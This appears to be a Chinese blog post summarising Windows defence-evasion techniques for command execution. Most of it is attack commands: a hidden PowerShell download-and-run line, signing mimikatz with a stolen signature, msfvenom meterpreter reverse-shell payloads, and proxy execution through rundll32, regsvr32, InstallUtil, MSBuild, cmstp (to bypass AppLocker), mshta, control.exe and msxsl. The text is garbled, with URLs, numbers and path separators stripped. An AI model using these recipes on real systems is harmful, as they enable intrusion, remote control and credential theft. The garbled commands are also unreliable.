2024年11月Windows命令执行防御规避总结

　　⑴今天小编为大家带来Windows命令执行防御规避总结，具体如下：

　　⑵powershell

　　⑶powershell.exe -nop -w hidden -c “IEX （（new-object .webclient.downloadstring（‘ /f

　　⑷通过sip劫持对恶意代码签名获得系统信任

　　⑸python sigthief.py -i consent.exe -t mimikatz.exe -o signed-mimikatz.exe

　　⑹rundll.exe

　　⑺msfvenom -a x --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT= -f dll 》xxx.dll

　　⑻rundll.exe shell.dll，Control_RunDLL xxx.dll

　　⑼Regsvr.exe

　　⑽msfconsole

　　⑾auxiliary/server/regsvr_mand_delivery_server

　　⑿set CMD user test /add

　　⒀regsvr /s /n /u /i: scrobj.dll

　　⒁InstallUtil.exe

　　⒂C：WindowsMicrosoft.Frameworkv..》csc.exe /r:System.EnterpriseServices.dll /unsafe /target:library /out:xxx.exe /keyfile：”C：Program Files （xMicrosoft SDKsWindowsv.AbinFX . Toolsxkey.snk“ xxx.cs

　　⒃InstallUtil.exe /U xxx.exe

　　⒄.msf监听，得到反弹的shell：

　　⒅set payload windows/x/meterpreter/reverse_tcp

　　⒆set LHOST xx.xx.xx.xx

　　⒇set LPORT

　　⒈Msbuild.exe

　　⒉MSBuild是Microsoft Build Engine的缩写，代表Microsoft和Visual Studio的新的生成平台，MSBuild可编译特定格式的xml文件

　　⒊msf生成shellcode

　　⒋msfvenom -p windows/x/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=

　　⒌-f csharp

　　⒍使用shellcode替换中的shellcode部分

　　⒎use exploit/multi/handler

　　⒏set payload windows/x/meterpreter/reverse_tcp

　　⒐set lhost xx.xx.xx.xx

　　⒑set lport

　　⒒C：WindowsMicrosoft.Frameworkv..MSBuild.exe exec.xml

　　⒓cmstp.exe /s /ns C：UsersadministratorAppDataLocalTempXKNqbpzl.txt绕过AppLocker并启动恶意脚本

　　⒔Mshta.exe

　　⒕Mshta.exe 是一个执行 Microsoft HTML 应用程序 （HTA 的实用程序，攻击者可以使用 mshta.exe 通过受信任的 Windows 实用程序代理执行恶意代码

　　⒖use exploit/windows/misc/hta_server

　　⒗msf exploit（windows/misc/hta_server 》 set srvhost xx.xx.xx.xx

　　⒘msf exploit（windows/misc/hta_server 》 exploit

　　⒙mshta.exe

　　⒚攻击者可以使用控制面板项作为有效载荷来执行任意命令，控制面板项是注册的可执行文件（.exe或控制面板（.cpl文件，可以直接从命令行执行或通过Control_RunDLL（API调用或者直接双击文件。

　　⒛攻击者构造恶意的dll文件CPIApplet.dll

　　①利用msf生成dll文件：

　　②msfvenom -p windows/x/meterpreter/reverse_tcp LHOST=... LPORT= -f dll 》 /tmp/CPIApplet.dll

　　③传入windows机器，然后重命名为CPIApplet.cpl，通过control.exe c：?administratordesktopCPIApplet.cpl 执行命令

　　④通过msxsl.exe调用恶意xml文件执行脚本

　　⑤customers.xml

　　⑥script.xsl

　　⑦xmlns:xsl=”

　　⑧xmlns:msxsl=”urn:schemas-microsoft-:xslt“

　　⑨xmlns:user=”

　　⑩function xml（nodelist {

　　Ⅰvar r = new ActiveXObject（”WScript.Shell“.Run（”cmd.exe /k calc.exe“;

　　Ⅱreturn nodelist.nextNode（.xml;

　　Ⅲ开启http服务

　　Ⅳpython -m http.server

　　Ⅴmsxsl.exe